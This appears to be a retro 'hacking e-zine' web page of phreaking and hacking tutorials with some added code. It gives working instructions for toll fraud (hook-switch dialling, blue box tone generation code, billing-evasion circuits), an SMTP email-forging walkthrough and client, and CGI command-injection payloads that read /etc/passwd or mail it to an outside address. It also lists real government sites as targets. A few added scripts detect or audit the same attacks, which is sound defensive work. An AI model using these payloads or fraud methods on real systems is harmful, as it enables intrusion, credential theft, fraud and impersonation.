Issue #1


Welcome to the first (and possibly only!) issue of Retro Hacking World. It's an e-zine for the computer underground written as if it's still 1985!

Jargon File Entry Of The Week

BUCKY BITS (primarily Stanford) noun. The bits produced by the CTRL and META shift keys on a Stanford (or Knight) keyboard. Rumor has it that the idea for extra bits for characters came from Niklaus Wirth, and that his nickname was "Bucky."

hack /hak/ noun 1. Originally a quick job that produces what is needed, but not well. 2. The result of that job.
phreaking /freek'ing/ noun [from `phone phreak']
1. The art and science of cracking the phone network to make free long-distance calls, for example. 2. By extension, security-cracking in any other context (especially, but not exclusively, on communications networks)


This issue we look at the fundamentals of phreaking - tones and pulses - both can be used to garner free calls from your local friendly telco :-)


Pulse dialing with the hook switch.

This is a well known method of getting around locks on rotary dial phones and may also be useful on really stupid COCOT-type private payphones. Old rotary dial phones use loop disconnect signalling: as the dial returns, each click disconnects the line for a few tens of milliseconds, nominally ten clicks a second. The exchange only counts the breaks, so with a bit of practice you can dial numbers by tapping the hook switch. One tap to dial 1. Two taps to dial 2. Ten taps to dial a 0. Leave a clear pause between digits, and don't hold the hook down much longer than a click or the exchange will take it as you hanging up.
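To show what the exchange is actually counting, here is the pulse train as hook-switch events and a decoder that turns it back into digits. This is an added example, not from the zine: the 60 ms break / 40 ms make / 700 ms inter-digit figures are the usual 10 pulse-per-second nominals and are assumed, and the decoder is deliberately tolerant so that hand-tapped pulses decode too.

```python
"""Loop-disconnect (pulse) dialling as the exchange sees it: a number becomes
a train of hook-switch breaks, and a train of breaks becomes digits again.
Added example, not from the zine; all timing constants are assumptions."""

BREAK_MS = 60           # loop open per pulse (nominal)
MAKE_MS = 40            # loop closed between pulses of one digit (nominal)
INTER_DIGIT_MS = 700    # loop closed between digits (nominal)

MIN_PULSE_MS = 20       # shorter opens are contact bounce, ignored
MAX_PULSE_MS = 300      # longer opens mean the handset went back on hook
DIGIT_GAP_MS = 250      # closed interval longer than this ends the digit


def encode(number, t0=0.0):
    """Hook-switch events as (time_ms, loop_closed) with nominal dial timing."""
    events, t = [], t0
    for ch in number:
        pulses = 10 if ch == "0" else int(ch)      # '0' is ten clicks
        for _ in range(pulses):
            events.append((t, False)); t += BREAK_MS   # hook up: loop open
            events.append((t, True));  t += MAKE_MS    # hook down: loop closed
        t += INTER_DIGIT_MS - MAKE_MS
    return events


def decode(events):
    """Digits from hook-switch events. Returns (digits, hung_up)."""
    digits, count = [], 0
    opened_at = closed_at = None

    def flush():
        nonlocal count
        if count:
            digits.append(str(count % 10) if count <= 10 else "?")
            count = 0

    for t, closed in sorted(events):
        if not closed:
            if closed_at is not None and t - closed_at > DIGIT_GAP_MS:
                flush()                                   # long make: digit over
            opened_at, closed_at = t, None
        else:
            if opened_at is not None:
                width = t - opened_at
                if width > MAX_PULSE_MS:
                    flush()
                    return "".join(digits), True          # that was a hang-up
                if width >= MIN_PULSE_MS:
                    count += 1                            # one more click
            opened_at, closed_at = None, t
    flush()
    return "".join(digits), False


if __name__ == "__main__":
    train = encode("2071")
    print(len(train), "hook events ->", decode(train))
    # hand-tapped, irregular timing still decodes
    print(decode([(0, False), (80, True), (200, False), (290, True),
                  (400, False), (470, True)]))
```

The decoder only ever sees open/closed transitions, which is why a locked dial is no obstacle: anything that can open the loop for the right sort of interval is a dial.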


Blueboxing

Blueboxing trunk lines within the UK died many years ago with the coming of System X. Some other countries still have ancient exchange equipment, so blueboxing can still work there and could be exploited by the UK phreak if she can find a way to reach such a country's phone system without paying for an international call, which rather defeats the point.

It is still possible to bluebox some connections from the UK where a call passes from one phone company to another and in-band signalling is used. C5 or R2 signalling may be used for compatibility even if both phone companies have more modern equipment.

   TONE MATRIX TO USE ONCE CONNECTED (row frequency + column frequency, Hz)
          900  : 1100 : 1300 : 1500 : 1700
    700:   1   :   2  :   4  :   7  :  11
    900:   +   :   3  :   5  :   8  :  12
   1100:   +   :   +  :   6  :   9  :  KP
   1300:   +   :   +  :   +  :  10  :  KP2
   1500:   +   :   +  :   +  :   +  :  ST

   (+ = same-frequency or duplicate pair, not used; 10 is the digit 0)

USE KP (1700+1100) TO START A CALL AND ST (1500+1700) TO STOP. USE 2600 HZ TO CONNECT/DISCONNECT (SEIZE AND RELEASE THE TRUNK).
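The matrix above is easier to trust once you can hear it and decode it. This added example (not from the zine) generates a trunk seizure followed by KP, some digits and ST as two-tone pulses, and recovers them with a Goertzel filter, the same trick an exchange's MF receiver uses. The pulse and gap lengths (55 ms digits, 100 ms KP, 200 ms of 2600 Hz) are nominal figures assumed here; the frequency pairs come straight from the table.

```python
"""Blue box MF signalling: encode symbols from the tone matrix as audio and
decode them again with Goertzel filters. Added example; timings assumed."""
import math

SAMPLE_RATE = 8000
MF_FREQS = (700, 900, 1100, 1300, 1500, 1700)
SEIZE_HZ = 2600

# symbol -> (low, high) frequency pair, straight from the matrix
MF_PAIRS = {
    "1": (700, 900),   "2": (700, 1100),  "3": (900, 1100),
    "4": (700, 1300),  "5": (900, 1300),  "6": (1100, 1300),
    "7": (700, 1500),  "8": (900, 1500),  "9": (1100, 1500),
    "0": (1300, 1500),
    "C11": (700, 1700), "C12": (900, 1700),
    "KP": (1100, 1700), "KP2": (1300, 1700), "ST": (1500, 1700),
}
PAIR_TO_SYMBOL = {v: k for k, v in MF_PAIRS.items()}

PULSE_MS = 55      # digit pulse length (assumed nominal)
KP_MS = 100        # KP is conventionally sent longer (assumed nominal)
GAP_MS = 55        # silence between pulses (assumed nominal)


def tone(freqs, ms, amplitude=0.4):
    """Sum of sine waves at the given frequencies, ms long; [] gives silence."""
    n = int(SAMPLE_RATE * ms / 1000)
    return [sum(amplitude * math.sin(2 * math.pi * f * i / SAMPLE_RATE)
                for f in freqs) for i in range(n)]


def encode(symbols, seize_ms=200):
    """2600 Hz to seize the trunk, then each symbol as a two-tone pulse."""
    samples = tone([SEIZE_HZ], seize_ms) + tone([], GAP_MS)
    for s in symbols:
        ms = KP_MS if s.startswith("KP") else PULSE_MS
        samples += tone(MF_PAIRS[s], ms) + tone([], GAP_MS)
    return samples


def goertzel(samples, freq):
    """Power of one frequency over a block of samples (second-order IIR)."""
    coeff = 2 * math.cos(2 * math.pi * freq / SAMPLE_RATE)
    s1 = s2 = 0.0
    for x in samples:
        s0 = x + coeff * s1 - s2
        s2, s1 = s1, s0
    return s1 * s1 + s2 * s2 - coeff * s1 * s2


def classify(frame):
    """'2600', an MF symbol, or None (silence) for one frame of audio."""
    n = len(frame)
    min_power = (0.05 * n / 2) ** 2            # ignore anything below amplitude 0.05
    p = {f: goertzel(frame, f) for f in MF_FREQS + (SEIZE_HZ,)}
    if p[SEIZE_HZ] > min_power and p[SEIZE_HZ] > max(p[f] for f in MF_FREQS):
        return "2600"
    lo, hi = sorted(sorted(MF_FREQS, key=p.get, reverse=True)[:2])
    if p[lo] > min_power and p[hi] > min_power:
        return PAIR_TO_SYMBOL.get((lo, hi))
    return None


def decode(samples, frame_ms=20):
    """Frame the audio, classify each frame, collapse runs into symbols."""
    n = int(SAMPLE_RATE * frame_ms / 1000)     # 160 samples: every tone is an exact bin
    out, prev, run = [], None, 0
    for start in range(0, len(samples) - n + 1, n):
        sym = classify(samples[start:start + n])
        run = run + 1 if sym == prev else 1
        prev = sym
        # a symbol must survive two consecutive frames; edge frames that
        # straddle a tone boundary can misread and are discarded this way
        if sym is not None and run == 2:
            out.append(sym)
    return out


if __name__ == "__main__":
    audio = encode(["KP", "2", "0", "7", "ST"])
    print(len(audio), "samples ->", decode(audio))
```

At 8 kHz with 20 ms frames every frequency in the table sits on an exact DFT bin, so the six MF filters do not leak into each other and the two strongest bins are always the right pair. The receiver side is the part worth keeping: it is what you would feed a line recording into to see whether anyone is sending MF down it.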


Current Limit

Here's an old one that might still work on a few exchanges.
This is the circuit for a device you can attach in line with your telephone so that people phoning you are not billed for the call. It fools the local exchange into thinking the phone is still ringing although you have answered it: it limits the current drawn from the line to a level below that needed to operate the answer-detection relay in a mechanical exchange. Use of this circuit often resulted in a crossed line because the exchange thought the trunk line was still free.

 Neg.                    RED    ______
 o___.___._||5mfd__.____________|     |
     |   | ||      |            |  P  |
     |   |         /  240 Ohm   |  H  |
     |   |________o o__/X/_.    |  O  |
P.B. o        Norm   Free  |    |  N  |
    >                     ---   |  E  |
     .             6volts-----  |     |
     |                    ---   |     |
     |                     |    |     |
 o___._____________________.____|_____|
 Pos.                  GREEN


2600 Tone Circuit

Yes! More ASCII art, I'm afraid. But this classic circuit will produce a tone of 2600 Hz for all your phreaking needs! The 555 is wired as an astable oscillator, so its frequency is set by the two resistors and the timing capacitor (roughly f = 1.44 / ((R1 + 2 R2) C)). Be warned that with the 1k, 5k and 3.3 uF values drawn here that formula tops out at a few hundred hertz, nowhere near 2600 Hz, so treat the timing capacitor value with suspicion and calibrate by ear against a known 2600 Hz source rather than trusting the parts list.


                +---+---------------------------+
                |   |                           |
                |   V      1k                   |
                | /\/\/-+-/\/\/-+-------------+ |
          +-----+  5k   |       |             | |
          |  ---|-------|-------|--------|--- | |
pshbtn  | o  |  8       7       6        5  | | |
switch -+    |                              | | |
        | o  |||          5 5 5             | | |
          |  |||          TIMER             | | |
          |  |                              | | |
  (+)-----+  |  1       2       3        4  | | |
9 volts      ---|-------|-------|--------|--- | |
  (-)-----------+       |       |        |    | |
                |       +---------------------+ |
                | 3.3uF         |        |      |
                +-->|--------------------+------+
                |               |
        4.7uF  \_/              |
               ---              |
                |(+)            |
                |     _____     |
                +---| 8ohm |----+
                   /__SPKR__\

Hacking
hacking /hak'ing/ noun
1. Originally a quick job that produces what is needed, but not well. 2. The result of that job.

A bit of a mixed bag, here.


Fake E-mail

  1. Telnet to port 25 of any mail server (eg. telnet site.name.and.address 25)
  2. Type: HELO yourhost{ENTER} (unfortunate, I know, but often needed)
  3. Type: MAIL FROM:<fake name and address>{ENTER} (this has to come before the recipient)
  4. Type: RCPT TO:<person to receive the fake mail>{ENTER}
  5. Type: DATA{ENTER}
  6. Type the header lines first (eg. Subject: and From:), then a blank line
  7. Enter your letter
  8. To send the letter type a "." on a line by itself{ENTER}
  9. Then type QUIT{ENTER}
  10. This is traceable by any sysadmin: the server stamps a Received: header with the address the connection really came from ... don't harass people this way.
  11. If the person receiving the mail uses a mail reader like elm he/she will not see the telltale fake message warning "Apparently-To: (name)" that sendmail adds when the message has no To: header; even if they do, most people wouldn't know what it means anyway.
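The same exchange with both sides present, so you can see what the server actually records. This is an added example and not from the zine: the server is a toy that implements only the verbs the walkthrough uses and verifies nothing (which is the whole point), all host and mailbox names are made up, and the two sides talk over a socketpair so it runs offline.

```python
"""SMTP envelope forgery, client and toy server, run offline over a socketpair.
Added example; host names and addresses are invented."""
import socket
import threading

CRLF = b"\r\n"


def readline(f):
    """One CRLF-terminated line as text, or None at end of stream."""
    raw = f.readline()
    if not raw:
        return None
    return raw.rstrip(b"\r\n").decode("latin-1")


def toy_smtp_server(conn, transcript):
    """Accept one message and return the envelope exactly as the client
    claimed it; like a 1990s MTA it checks nothing."""
    f = conn.makefile("rb")
    conn.sendall(b"220 mail.target.example ESMTP" + CRLF)
    env = {"helo": None, "mail_from": None, "rcpt_to": [], "data": None}
    while True:
        line = readline(f)
        if line is None:
            break
        transcript.append("C: " + line)
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb == "HELO":
            env["helo"] = arg
            reply = "250 mail.target.example"
        elif verb == "MAIL":                    # MAIL FROM:<addr>, taken on trust
            env["mail_from"] = arg.split(":", 1)[1].strip()
            reply = "250 OK"
        elif verb == "RCPT":                    # RCPT TO:<addr>
            env["rcpt_to"].append(arg.split(":", 1)[1].strip())
            reply = "250 OK"
        elif verb == "DATA":
            transcript.append("S: 354 End data with <CR><LF>.<CR><LF>")
            conn.sendall(b"354 End data with <CR><LF>.<CR><LF>" + CRLF)
            body = []
            while True:
                row = readline(f)
                if row is None or row == ".":
                    break
                body.append(row[1:] if row.startswith("..") else row)  # undo dot-stuffing
            env["data"] = "\n".join(body)
            reply = "250 OK queued"
        elif verb == "QUIT":
            reply = "221 Bye"
        else:
            reply = "500 Unrecognised command"
        transcript.append("S: " + reply)
        conn.sendall(reply.encode() + CRLF)
        if verb == "QUIT":
            break
    conn.close()
    return env


def forge_mail(conn, helo, mail_from, rcpt_to, headers, body):
    """Client side, in the order SMTP requires: HELO, MAIL FROM, RCPT TO, DATA, QUIT."""
    f = conn.makefile("rb")

    def expect(code, after):
        reply = readline(f)
        if reply is None or not reply.startswith(code):
            raise RuntimeError(f"after {after!r} expected {code}, got {reply!r}")

    def send(line, code):
        conn.sendall(line.encode() + CRLF)
        expect(code, line)

    expect("220", "connect")
    send(f"HELO {helo}", "250")
    send(f"MAIL FROM:<{mail_from}>", "250")      # the forged envelope sender
    send(f"RCPT TO:<{rcpt_to}>", "250")
    send("DATA", "354")
    for row in [f"{k}: {v}" for k, v in headers] + [""] + body.splitlines():
        stuffed = "." + row if row.startswith(".") else row   # dot-stuffing
        conn.sendall(stuffed.encode() + CRLF)
    send(".", "250")                              # a lone dot ends the message
    send("QUIT", "221")


def run_forgery():
    """Drive client and server in-process; returns (envelope, transcript)."""
    client_sock, server_sock = socket.socketpair()
    transcript, env = [], {}
    worker = threading.Thread(
        target=lambda: env.update(toy_smtp_server(server_sock, transcript)))
    worker.start()
    forge_mail(client_sock, "attacker.example",
               "president@whitehouse.example", "victim@target.example",
               [("From", "The President <president@whitehouse.example>"),
                ("Subject", "Re: your budget")],
               "No To: header, so a real sendmail would add Apparently-To:.\n"
               ".a line starting with a dot survives because it is dot-stuffed")
    client_sock.close()
    worker.join()
    return env, transcript


if __name__ == "__main__":
    envelope, lines = run_forgery()
    print("\n".join(lines))
    print(envelope)
```

Nothing in the envelope ties the claimed sender to the connecting host; only the Received: line a real server adds (from the peer address, not from anything the client typed) does that, which is why step 10 above is true.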

Keyboard stuff

You can generate arbitrary ASCII codes (and the extended characters above 127) on a PC keyboard by holding down ALT and typing the character's decimal code on the numeric keypad.

This came in handy for hiding files on computers running DOS in the pre-DOS 5 days. Create a directory with an odd character in the name and it would stop most people from getting at your games. ALT 234 appears as an ohm symbol (Ω) in the standard DOS character set (code page 437) and is easy to remember; don't confuse it with ALT 123, which just gives you a brace ({).

Ever wondered what ALT GR is for? Non-English keyboards use AltGr as a third shift key: many of their keys carry three symbols, for accented letters and suchlike. On a UK keyboard the only key with three symbols is usually the one below Escape (` ¬ ¦); holding AltGr and pressing it produces the broken bar (¦), which looks like a pipe but is not the same character as the | on the key next to Z. A US keyboard has no AltGr at all (the right-hand Alt is just Alt).


Password shadowing

What is password shadowing? Password shadowing is a security system where the encrypted password field of /etc/passwd is replaced with a special token and the encrypted password is stored in a separate file which is not readable by normal system users. On some older systems the C library would fill in the real hash for any caller, so you could defeat shadowing by writing a program that uses successive calls to getpwent() to dump the password file. On a properly shadowed system (Linux with glibc, for instance) an unprivileged caller just gets the "x" token back, so the trick only works where the library does the privileged lookup on the caller's behalf. Example:

#include <stdio.h>
#include <pwd.h>

int main(void)
{
    struct passwd *p;

    /* Walk the whole password database one entry at a time; on a shadowed
       system an unprivileged caller normally just gets "x" in pw_passwd */
    while ((p = getpwent()) != NULL)
        printf("%s:%s:%ld:%ld:%s:%s:%s\n",
               p->pw_name, p->pw_passwd,
               (long)p->pw_uid, (long)p->pw_gid, p->pw_gecos,
               p->pw_dir, p->pw_shell);
    endpwent();
    return 0;
}
(from the alt.2600 FAQ)
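Whichever way you got hold of a passwd file, the first thing to check is whether shadowing actually happened. This added example (not from the FAQ) audits passwd-format text for the things an attacker would go for: hashes sitting in the world-readable file, empty password fields, and extra uid-0 accounts. The records are constructed; the hash formats it recognises are traditional 13-character DES crypt and the $id$ modular crypt family.

```python
"""Audit passwd(5) data for password fields that never got shadowed.
Added example; the sample records below are constructed."""
import re

# What the second field holds when the real hash lives in /etc/shadow (or
# master.passwd) or the account is locked; anything else is worth a look.
SHADOW_TOKENS = {"x", "*", "!", "!!", "NP", "*NP*", "*LK*"}
# Traditional DES crypt: 13 chars of [./0-9A-Za-z]; modular crypt: $id$...
HASH_RE = re.compile(r"^(?:[./0-9A-Za-z]{13}|\$[0-9a-z]+\$.+)$")


def classify_password_field(field):
    if field == "":
        return "empty"                 # logs in with no password at all
    if field in SHADOW_TOKENS or field.startswith("!"):
        return "shadowed_or_locked"
    if HASH_RE.match(field):
        return "hash"                  # crackable material in a world-readable file
    return "unknown"


def audit_passwd(text):
    """Map each user in passwd-format text to its password verdict and uid."""
    findings = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings[line] = {"password": "malformed", "uid": None}
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        findings[name] = {"password": classify_password_field(pw),
                          "uid": int(uid) if uid.isdigit() else None}
    return findings


def risky_accounts(text):
    """Users an attacker with read access to this file would go for first:
    unshadowed hashes, empty passwords, and extra uid-0 accounts."""
    out = []
    for name, f in audit_passwd(text).items():
        if f["password"] in ("empty", "hash") or (f["uid"] == 0 and name != "root"):
            out.append(name)
    return sorted(out)


# constructed sample: two unshadowed hashes, one empty password, one spare uid 0
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bob:Npge08pfz4wuk:1001:1001:Bob:/home/bob:/bin/sh
alice:$6$saltsalt$Zf9eXp3h2kQ:1002:1002:Alice:/home/alice:/bin/sh
guest::1003:1003:Guest:/home/guest:/bin/sh
toor:x:0:0:second root:/:/bin/sh
"""

if __name__ == "__main__":
    for user, verdict in audit_passwd(SAMPLE_PASSWD).items():
        print(f"{user:8} {verdict}")
    print("risky:", risky_accounts(SAMPLE_PASSWD))
```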


Hacking from your Web Browser

by Modify of Technophoria

This file will describe several techniques to acquire a password file just by using an ordinary web browser. The information is pitched at the beginner hacker, but all hackers should benefit from it. We will only cover phf in this file, but feel free to explore other programs in the cgi directory such as nph-test-cgi or test-cgi. And now... get comfortable... sit back... and read.

There are several techniques in what I call "Web Browser Hacking". Many beginners don't know that you can pull an /etc/passwd file from your browser, and in this chapter I will describe the ways to acquire a passwd file. First you need to find a box that is running the cgi-bin/phf program. A great way to find out without trial and error is to go to www.altavista.com and search on cgi-bin AND perl.exe or cgi-bin AND phf.


Finger box hacking:
Let's say you wanted to break into somewhere like... hmmm, AOL. The first thing we would do is type their web site into the URL bar: http://www.aol.com. Next add /cgi-bin/finger to the URL so it looks like this: http://www.aol.com/cgi-bin/finger. If the finger gateway is operational a box should appear for you to enter the name you want to finger, and you have a chance of receiving the /etc/passwd file. Next you will probably want to find an e-mail address on the site: just scan the page for any mailto references. Go back to the finger box and type in this query:

  nobody@nowhere.org ; /bin/mail me@junk.org < /etc/passwd

The gateway hands the whole string to a shell, so the semicolon ends the finger command and the rest runs as a second command that mails the passwd file to your address. If this works you now have the /etc/passwd file in your mailbox; you can run a crack program against it and have a little fun on their box.

The common cgi-bin/phf query:
This section is for the very beginning hacker (all advanced hackers need not apply). Take the same scenario as the first example, except in the URL we would type http://www.aol.com/cgi-bin/phf. If phf is operational and has not been removed you should get a series of search boxes on the next page (ignore these boxes). To the URL add this string:

  ?Qalias=x%0a/bin/cat%20/etc/passwd

so the entire thing looks like http://www.aol.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd. The %0a is a newline: phf escaped the usual shell metacharacters before handing the query to a shell but forgot that one, so everything after it runs as a second command. This will print the /etc/passwd file straight to your web browser; all you need to do is save it as a file and again run a crack program against it. (This assumes the password field isn't shadowed, i.e. it isn't :*: or :x:.)
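Seen from the other side of the wire, every one of these requests lands in the web server's access log with the payload still in it. This added example (not part of the article) decodes the query strings of requests to the scripts the article names, plus the finger gateway from the previous section, and flags the newline that phf failed to escape and the other shell separators. The log lines are constructed.

```python
"""Detect phf-style CGI command injection in Apache access logs.
Added example; the log lines are constructed, not from any real server."""
import re
from urllib.parse import urlsplit, parse_qsl

WATCHED_SCRIPTS = {"phf", "test-cgi", "nph-test-cgi", "finger"}
# newline is the character phf's escaping forgot; the rest are the usual
# shell separators, plus '*' because test-cgi echoed QUERY_STRING unquoted
# and let the shell expand globs
SHELL_META = ("\n", "\r", ";", "|", "`", "$(", "<", ">", "*")
SENSITIVE = ("/etc/passwd", "/etc/shadow", "/etc/master.passwd")

# Apache common log format: ip ident user [time] "method target proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3})')


def inspect_target(target):
    """Return (script, [(field, decoded text), ...]) for a watched script;
    the list is empty when nothing looks like injection."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    if script not in WATCHED_SCRIPTS:
        return script, []
    hits = []
    # parse_qsl percent-decodes, so %0a arrives here as a real newline;
    # a query with no '=' (the finger form) comes back as the key, so check both
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        for text in (key, value):
            if any(m in text for m in SHELL_META) or any(p in text for p in SENSITIVE):
                hits.append((key, text))
                break
    return script, hits


def detect(log_text):
    """One alert per suspicious field in each log line."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        script, hits = inspect_target(m["target"])
        for key, text in hits:
            alerts.append({"ip": m["ip"], "time": m["ts"], "status": m["status"],
                           "script": script, "field": key, "payload": text})
    return alerts


# constructed log: a benign phf lookup, the phf attack, the finger attack, noise
SAMPLE_LOG = """\
10.0.0.7 - - [12/Sep/2000:21:14:03 +0100] "GET /cgi-bin/phf?Qname=smith HTTP/1.0" 200 813
192.0.2.44 - - [12/Sep/2000:21:15:10 +0100] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 2571
192.0.2.44 - - [12/Sep/2000:21:16:42 +0100] "GET /cgi-bin/finger?nobody%40nowhere.example%20%3B%20/bin/mail%20me%40junk.example%20%3C%20/etc/passwd HTTP/1.0" 200 96
10.0.0.7 - - [12/Sep/2000:21:17:00 +0100] "GET /index.html HTTP/1.0" 200 4404
"""

if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(a["ip"], a["script"], repr(a["payload"]))
```

The decoded payload is what the shell saw, which is the thing to keep in the alert: a 200 status on the phf line means the command ran and the file went out. The fix in phf was to add newline to the escaped set; the real fix for any such gateway is to never build a shell command string from the query at all.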

About the site

This site was created following a discussion about the A4 monitors at Xerox PARC. Even now, nearly 30 years on, we can only get A4 displays on handhelds. Progress? Hardly.

So we built a site that would only look 'right' when viewed on an A4 display. Or, failing that, a monitor turned onto its side!

For content we chose a 'hacking' theme with old news. This was for two reasons:
1) a little retro-chic
2) we wouldn't have to worry about compromising system security since any flaws should have been fixed by now :-)

It was incorporated in the 'Blue Dust' think tank in September 2000.


Why?

We had too much time on our hands! Any questions?

Credits

The site was conceived by Spider & Bob Smith

Original Graphics by Bob Smith

Coding and graphics by Spider

Original articles by Bob Smith

Other articles from alt.2600

Site design and production ©2000. All Rights Reserved



E-mail
spider@BlueDust.com



This site was conceived, designed, coded, drawn, produced, edited, re-editable and generally fussed over by us two!

Links - 2 Learn

Try out these links for the latest news, best interviews and interesting features.

2600 - Speaks for itself
2600 London - The local group of both authors
Phrack - How many hours have I spent reading this?
CCC - Germany's Chaos Computer Club
And of course, BugTraq, et al...

Links - 2 Hack

Prove your mettle by hacking these sites. We do not authorise or condone this action, of course!

Nasa
The Pentagon
The Whitehouse
Micro$oft
(sorry, the last one's already been done :-)

Links - 2 Relax

Kick back in pipe and slippers with these URLs!

Freshmeat
Star Wars
TrekGuide.com
Brickshelf.com

Links - 2 Get

Download sites for useful (and not so useful) stuff.

Debian.org
tucows.com
jumbo.com
linux.org.uk





Parts for the 2600 tone circuit: 555 timer IC, 8 ohm speaker, 9 volt battery and connector, pushbutton switch, 5k potentiometer, 1k ohm resistor, 4.7 microfarad capacitor, 3.3 microfarad capacitor.
Key to the drawing: --+-- = connection; ----- (no dot) = no connection.
link rot noun. The natural decay of web links as the sites they're connected to change or die. Compare bit rot.

----- Original mail:

The following info comes from a leaflet entitled 'FREEFONE':

"British Telecom's recent record profits and continuing appalling service have prompted the circulation of this information. It comprises a method of making telephone calls free of charge."

Circuit Diagram:

[The ASCII circuit diagram has not survived; only the LINE and PHONE terminals and the part labels below are legible.]

S1 = XXX
C1 = XXX
D1 = XXX
D2 = XXX
R1 = XXX

Continued...

MSG#: 1029 *EREWHON* 09/25/83 23:19:17 (Read 87 Times)
From xxxxxxxxxxx
To: ALL
Subj: FREEFONE PART 2

Circuit Operation

The circuit inhibits the charging for incoming calls only. When a phone is answered, there is normally approx. 100mA DC loop current but only 8mA or so is necessary to polarise the mic in the handset. Drawing only this small amount is sufficient to fool BT's ancient "Electric Meccano". It's extremely simple. When ringing, the polarity of the line reverses so D1 effectively answers the call when the handset is lifted. When the call is established, the line polarity reverts and R1 limits the loop current while D2 is a LED to indicate the circuit is in operation. C1 ensures speech is unaffected. S1 returns the telephone to normal.

Local calls of unlimited length can be made free of charge. Long distance calls using this circuit are prone to automatic disconnection; this varies from area to area but you will get at least 3 minutes before the line is closed down. Further experimentation should bear fruit in this respect. With the phone on the hook this circuit is completely undetectable. The switch should be closed if a call is received from an operator, for example, or to make an outgoing call. It has proved extremely useful, particularly for friends phoning from pay phones with jammed coin slots.

*Please DO NOT tell ANYONE where you found this information*



Frequencies

NEEDED CCITT FUNCTIONS (FREQUENCIES)
Function - frequency (Hz) - short info

BLUE BOX FREQUENCIES:

  2600 Hz - used to get on/off the trunk (seize and release)

  TONE MATRIX TO USE AFTER 2600 HZ (row frequency + column frequency):

          900  : 1100 : 1300 : 1500 : 1700
    700:   1   :   2  :   4  :   7  :  11
    900:   +   :   3  :   5  :   8  :  12
   1100:   +   :   +  :   6  :   9  :  KP
   1300:   +   :   +  :   +  :  10  :  KP2
   1500:   +   :   +  :   +  :   +  :  ST

  USE KP (1700+1100) TO START A CALL AND ST (1500+1700) TO STOP. USE 2600 HZ TO DISCONNECT.

  Or, as a list:
    1    -  700 & 900   - to dial "1"
    2    -  700 & 1100  - to dial "2"
    3    -  900 & 1100  - to dial "3"
    4    -  700 & 1300  - to dial "4"
    5    -  900 & 1300  - to dial "5"
    6    - 1100 & 1300  - to dial "6"
    7    -  700 & 1500  - to dial "7"
    8    -  900 & 1500  - to dial "8"
    9    - 1100 & 1500  - to dial "9"
    0    - 1300 & 1500  - to dial "0" (the "10" in the matrix)
    C.11 -  700 & 1700  - inward operator
    C.12 -  900 & 1700  - delay operator
    KP1  - 1100 & 1700  - key pulse, terminal call
    KP2  - 1300 & 1700  - key pulse, transit call
    ST   - 1500 & 1700  - end of pulsing
    DHLS - 1850         - disable holdline switching



A blue box can:

Key to the current limit circuit: P.B. = pushbutton; R = 40 x battery voltage (eg. 6V = 240 ohm).

To calibrate the 2600 tone circuit: play it next to a pure 2600 Hz source and adjust the 5k potentiometer until the two sounds are the same. As you get closer you will hear a beat tone form and get slower and slower. When it stops, the two frequencies are equal. This takes a little practice.

ALT 124 produces the pipe symbol (|) used in Unix shells to chain the output of one command into another. This symbol is also used in C programming. The ALT trick can be handy if your keyboard map is troublesome and you can't find the pipe symbol.